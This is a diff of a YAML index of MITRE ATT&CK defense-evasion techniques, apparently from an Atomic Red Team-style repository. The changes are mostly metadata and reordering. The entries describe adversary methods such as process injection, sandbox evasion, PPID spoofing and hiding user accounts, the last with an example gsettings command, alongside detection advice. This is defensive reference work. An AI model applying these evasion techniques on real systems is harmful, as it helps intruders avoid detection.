-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7225,7 +7342,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -8146,7 +8255,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -8259,7 +8365,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
